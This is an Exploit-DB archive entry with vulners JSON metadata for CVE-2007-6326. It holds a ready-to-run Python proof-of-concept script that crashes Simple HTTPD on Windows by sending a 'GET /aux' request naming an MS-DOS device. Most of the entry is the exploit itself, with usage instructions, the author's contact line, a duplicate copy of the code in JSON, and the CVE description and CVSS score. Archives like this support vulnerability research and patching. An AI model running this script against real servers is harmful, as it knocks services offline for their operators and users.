ID EDB-ID:4717Type exploitdbReporter shinnaiModified 2007-12-11T00:00:00
Description
Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit. CVE-2007-6326. Dos exploit for windows platform
#usage: poc.py host port
import socket
import sys
print "-----------------------------------------------------------------------"
print "Simple HTTPD 1.3 /aux Denial of Service\n"
print "url: http://shttpd.sourceforge.net\n"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "-----------------------------------------------------------------------"
host = sys.argv[1]
port = long(sys.argv[2])
try:
request = "GET /aux HTTP/1.1\n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
except:
print "Unable to connect. exiting."
# milw0rm.com [2007-12-11]
{"hash": "2b8eeb72def06c5f85f7c3d945862d23fe9b61f7f9ceadf04f94f7c258425239", "id": "EDB-ID:4717", "lastseen": "2016-01-31T21:36:24", "enchantments": {"vulnersScore": 5.0}, "bulletinFamily": "exploit", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/4717/", "description": "Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit. CVE-2007-6326. Dos exploit for windows platform", "title": "Simple HTTPD <= 1.41 /aux Remote Denial of Service Exploit", "sourceData": "#usage: poc.py host port\n\nimport socket\nimport sys\n\nprint \"-----------------------------------------------------------------------\"\nprint \"Simple HTTPD 1.3 /aux Denial of Service\\n\"\nprint \"url: http://shttpd.sourceforge.net\\n\"\nprint \"author: shinnai\"\nprint \"mail: shinnai[at]autistici[dot]org\"\nprint \"site: http://shinnai.altervista.org\"\nprint \"-----------------------------------------------------------------------\"\n\nhost = sys.argv[1]\nport = long(sys.argv[2])\n\ntry:\n request = \"GET /aux HTTP/1.1\\n\\n\"\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection.connect((host, port))\n connection.send(request)\nexcept:\n print \"Unable to connect. exiting.\"\n\n# milw0rm.com [2007-12-11]\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-6326"], "published": "2007-12-11T00:00:00", "osvdbidlist": ["43660"], "references": [], "reporter": "shinnai", "modified": "2007-12-11T00:00:00", "href": "https://www.exploit-db.com/exploits/4717/"}
{"result": {"cve": [{"id": "CVE-2007-6326", "type": "cve", "title": "CVE-2007-6326", "description": "Sergey Lyubka Simple HTTPD (shttpd) 1.3 on Windows allows remote attackers to cause a denial of service via a request that includes an MS-DOS device name, as demonstrated by the /aux URI.", "published": "2007-12-13T14:46:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6326", "cvelist": ["CVE-2007-6326"], "lastseen": "2017-09-29T14:25:37"}]}}
